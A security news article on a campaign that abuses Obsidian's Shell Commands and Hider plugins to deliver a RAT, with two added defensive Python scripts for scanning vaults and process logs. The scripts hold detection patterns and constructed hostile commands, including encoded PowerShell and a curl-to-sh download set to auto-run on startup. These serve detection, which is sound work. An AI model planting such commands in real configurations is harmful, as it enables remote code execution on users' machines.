Hackers Use Obsidian Plugins to Distribute Malware

17.04.2026 4 minutes Author: Newsman

Researchers have documented a new attack in which the popular note-taking app Obsidian serves as the entry point for infecting systems. The campaign targets users in the financial and cryptocurrency sectors and ends with the deployment of a previously unknown remote access trojan.

The research describes a new social-engineering scheme rather than a software exploit: the attackers use the Obsidian note-taking application as the delivery channel, single out people working in finance and cryptocurrency, and ultimately deploy a previously undocumented Windows remote access trojan (RAT) tracked as PHANTOMPULSE.

Elastic Security Labs tracks the campaign as REF6598. It does not rely on any vulnerability in Obsidian's code; instead the attackers exploit the trust that users place in their collaborators and in a shared vault.

First, the attacker identifies a target on LinkedIn and messages them on behalf of a supposed venture capital firm. After some initial back-and-forth, the conversation moves to Telegram, where a group chat is created in which several "parties" discuss opportunities related to financial and cryptocurrency liquidity with the victim.

The group setting lends the exchange enough credibility that the victim accepts an invitation to collaborate on an Obsidian project: they receive a link to a shared Obsidian vault and the login credentials needed to open it. This is the point at which the attack is carried out.

Once the victim opens the shared vault and accepts the prompt to synchronize the installed community plugins, malicious code executes. According to the researchers, the attackers use legitimate Obsidian plugins for this, specifically Shell Commands and Hider.

Shell Commands lets them run operating-system commands from within Obsidian, while Hider removes UI elements that would otherwise tip the user off to suspicious activity. Note that Hider is disabled by default, so the attacker has to trick the victim into enabling it manually.

Also according to the researchers, all of the malicious logic lives in JSON configuration files, so traditional signature-based antivirus may miss it entirely. And because the attack vector is a legitimate Electron-based application, the activity blends in with normal behavior, which makes detecting the malware harder still.
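Because the payload is plain configuration, the practical check is to read the vault's plugin configuration rather than scan binaries. The following script is an added example, not part of the article or of Elastic's tooling, that triages an Obsidian vault: it reads which community plugins are enabled, pulls every command configured in the Shell Commands plugin, and flags commands that have no business in a note-taking vault (download cradles, encoded PowerShell, osascript). The plugin IDs `obsidian-shellcommands` and `obsidian-hider`, the `community-plugins.json` layout and the `shell_commands` / `platform_specific_commands` / `events` keys in `data.json` are assumptions based on the plugins' public configuration format, not facts taken from the page; the sample vault it builds is constructed for the demo.

```python
"""Triage an Obsidian vault for the plugin abuse described above.

Added example, not from the article or from Elastic. Assumed (not on the page):
plugin IDs "obsidian-shellcommands" / "obsidian-hider", enabled plugins listed in
<vault>/.obsidian/community-plugins.json, and Shell Commands keeping its commands
in <vault>/.obsidian/plugins/obsidian-shellcommands/data.json under "shell_commands".
"""
import json
import re
import tempfile
from pathlib import Path

SHELL_PLUGIN = "obsidian-shellcommands"   # assumed plugin ID
HIDER_PLUGIN = "obsidian-hider"           # assumed plugin ID

# Command fragments that should never appear in a collaborative note vault.
SUSPICIOUS = [
    r"powershell[^|]*(-enc|-e\b|downloadstring|invoke-webrequest|iwr\b|iex\b)",
    r"\bcurl\b.*\|\s*(ba)?sh\b",
    r"\bosascript\b",
    r"\bcertutil\b.*-urlcache",
    r"\b(mshta|rundll32|regsvr32)\b",
]


def _command_strings(entry):
    """Collect command text from one Shell Commands entry. Older plugin versions
    used "shell_command"; newer ones use "platform_specific_commands" (assumed)."""
    cmds = []
    if isinstance(entry.get("shell_command"), str):
        cmds.append(entry["shell_command"])
    psc = entry.get("platform_specific_commands")
    if isinstance(psc, dict):
        cmds.extend(v for v in psc.values() if isinstance(v, str))
    return cmds


def flag_command(cmd):
    """Return the SUSPICIOUS patterns that match a configured command."""
    return [p for p in SUSPICIOUS if re.search(p, cmd, re.IGNORECASE)]


def scan_vault(vault):
    cfg = Path(vault) / ".obsidian"
    enabled = set()
    listing = cfg / "community-plugins.json"
    if listing.is_file():
        enabled = set(json.loads(listing.read_text(encoding="utf-8")))
    report = {
        "hider_enabled": HIDER_PLUGIN in enabled,
        "shell_commands_enabled": SHELL_PLUGIN in enabled,
        "commands": [],
    }
    data = cfg / "plugins" / SHELL_PLUGIN / "data.json"
    if data.is_file():
        settings = json.loads(data.read_text(encoding="utf-8"))
        for entry in settings.get("shell_commands", []):
            # "events" holds triggers that run the command without a click (assumed key).
            events = entry.get("events", {})
            auto = sorted(k for k, v in events.items() if v) if isinstance(events, dict) else []
            for cmd in _command_strings(entry):
                report["commands"].append({
                    "id": entry.get("id"),
                    "command": cmd,
                    "auto_events": auto,
                    "flags": flag_command(cmd),
                })
    report["suspicious"] = report["shell_commands_enabled"] and any(
        c["flags"] for c in report["commands"])
    return report


def build_sample_vault(root):
    """Write a constructed vault that mirrors the technique (not a real sample)."""
    plugin_dir = Path(root) / ".obsidian" / "plugins" / SHELL_PLUGIN
    plugin_dir.mkdir(parents=True)
    (Path(root) / ".obsidian" / "community-plugins.json").write_text(
        json.dumps([SHELL_PLUGIN, HIDER_PLUGIN]), encoding="utf-8")
    (plugin_dir / "data.json").write_text(json.dumps({"shell_commands": [
        {"id": "a1",
         "platform_specific_commands": {
             "win32": "powershell -w hidden -enc SQBFAFgA",   # constructed; decodes to IEX
             "darwin": "osascript -e 'do shell script \"curl -fsSL http://example.invalid/s | sh\"'"},
         "events": {"after-obsidian-starts": {"enabled": True}}},
        {"id": "b2", "shell_command": "git pull", "events": {}},
    ]}), encoding="utf-8")
    return Path(root)


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return scan_vault(build_sample_vault(tmp))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against a real vault with `scan_vault("/path/to/vault")`. The two things to read off the report are whether Hider is enabled (the article notes it is off by default, so its presence in a vault you were handed is itself a signal) and whether any Shell Commands entry both matches a cradle pattern and carries an auto-run event, which is the combination that turns a synced vault into a dropper without any further click.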

PHANTOMPULSE supports the following functions:

  • execute commands on the infected host

  • download and run files from remote servers

  • capture screenshots

  • log keystrokes

  • elevate its own privileges to SYSTEM via the COM elevation moniker so that further malicious processes can be launched as SYSTEM

  • delete traces of its presence on the machine

The macOS variant differs slightly in its approach but follows the same process. Instead of a Python or bash dropper, the attackers use an obfuscated AppleScript dropper that works through a list of domains and falls back to Telegram to determine its C2 address. This gives the attackers flexibility in their infrastructure and makes domain-based blocking considerably harder.

At the end of this process, the script downloads what appears to be the second stage of the malware via osascript. What that second stage does is still unknown: the attacker-controlled infrastructure had been taken down by law enforcement and was no longer available for analysis.
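Since the dropper can switch domains and fall back to Telegram, a domain blocklist is a weak control; the durable signal is the process chain itself: an osascript process, ultimately launched from Obsidian, whose children fetch from the network. The script below is an added example, not from the article or from Elastic, that correlates EDR-style process events to find exactly that chain and notes when one of the contacted hosts is the Telegram API. The event format (one JSON object per line with `ts`, `pid`, `ppid`, `exe`, `cmdline` and an optional `dest` host) and every sample line are constructed for the demo; adapt `load_events` to your own telemetry export.

```python
"""Correlate macOS process events to find an AppleScript dropper that fetches a
second stage, with Telegram as its C2 fallback. Added example, not from the
article or Elastic. Event schema and sample lines are constructed (not real
telemetry): ts, pid, ppid, exe, cmdline, optional dest (host the process reached).
"""
import json
import os
from collections import defaultdict

FETCHERS = {"curl", "wget", "python3", "nscurl"}
TELEGRAM_HOSTS = {"api.telegram.org", "t.me"}

# Constructed EDR-style events. Domains use .invalid so nothing here resolves.
SAMPLE_EVENTS = r"""
{"ts": 10, "pid": 100, "ppid": 1,   "exe": "/Applications/Obsidian.app/Contents/MacOS/Obsidian", "cmdline": "Obsidian"}
{"ts": 11, "pid": 101, "ppid": 100, "exe": "/bin/zsh", "cmdline": "zsh -c osascript /tmp/sync.scpt"}
{"ts": 12, "pid": 102, "ppid": 101, "exe": "/usr/bin/osascript", "cmdline": "osascript /tmp/sync.scpt"}
{"ts": 13, "pid": 103, "ppid": 102, "exe": "/bin/sh", "cmdline": "sh -c curl -fsSL https://cdn-one.invalid/update"}
{"ts": 14, "pid": 104, "ppid": 103, "exe": "/usr/bin/curl", "cmdline": "curl -fsSL https://cdn-one.invalid/update", "dest": "cdn-one.invalid"}
{"ts": 15, "pid": 105, "ppid": 102, "exe": "/bin/sh", "cmdline": "sh -c curl -fsSL https://api.telegram.org/bot000:AA/getUpdates"}
{"ts": 16, "pid": 106, "ppid": 105, "exe": "/usr/bin/curl", "cmdline": "curl -fsSL https://api.telegram.org/bot000:AA/getUpdates", "dest": "api.telegram.org"}
{"ts": 20, "pid": 200, "ppid": 1,   "exe": "/Applications/Safari.app/Contents/MacOS/Safari", "cmdline": "Safari", "dest": "t.me"}
{"ts": 30, "pid": 300, "ppid": 1,   "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "cmdline": "Terminal"}
{"ts": 31, "pid": 301, "ppid": 300, "exe": "/usr/bin/osascript", "cmdline": "osascript -e 'display notification \"done\"'"}
"""


def load_events(text):
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_applescript_droppers(events):
    """Return one finding per osascript process whose descendants fetched from the network."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])

    def descendants(pid):
        seen, stack, out = {pid}, [pid], []
        while stack:
            for child in children[stack.pop()]:
                if child not in seen:          # guard against malformed cyclic data
                    seen.add(child)
                    out.append(child)
                    stack.append(child)
        return out

    def top_ancestor(pid):
        e = by_pid[pid]
        while e["ppid"] in by_pid:
            e = by_pid[e["ppid"]]
        return os.path.basename(e["exe"])

    findings = []
    for e in events:
        if os.path.basename(e["exe"]) != "osascript":
            continue
        hosts = sorted({
            by_pid[c]["dest"] for c in descendants(e["pid"])
            if os.path.basename(by_pid[c]["exe"]) in FETCHERS and by_pid[c].get("dest")
        })
        if not hosts:
            continue   # osascript with no network-fetching children: ordinary automation
        findings.append({
            "pid": e["pid"],
            "cmdline": e["cmdline"],
            "launched_by": top_ancestor(e["pid"]),   # the app at the root of the chain
            "hosts": hosts,
            "telegram_fallback": any(h in TELEGRAM_HOSTS for h in hosts),
        })
    return findings


if __name__ == "__main__":
    for f in find_applescript_droppers(load_events(SAMPLE_EVENTS)):
        print(json.dumps(f))
```

The benign cases in the sample are deliberate: Safari reaching `t.me` is not flagged because the rule keys on the osascript parent, not the domain, and the Terminal-launched `osascript -e 'display notification ...'` is not flagged because it never fetches anything. Only the chain rooted in Obsidian, with a fetch to a rotating domain followed by a fetch to the Telegram API, produces a finding.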

In this instance the attack therefore failed to achieve its objective: it was detected and blocked by security controls while the attackers were still trying to gain a foothold.

Elastic states that this incident reflects a developing trend: attackers are moving away from finding and exploiting vulnerabilities and toward abusing features built into legitimate applications. Here the attackers bypassed traditional protection mechanisms entirely by getting the users to do the work for them.
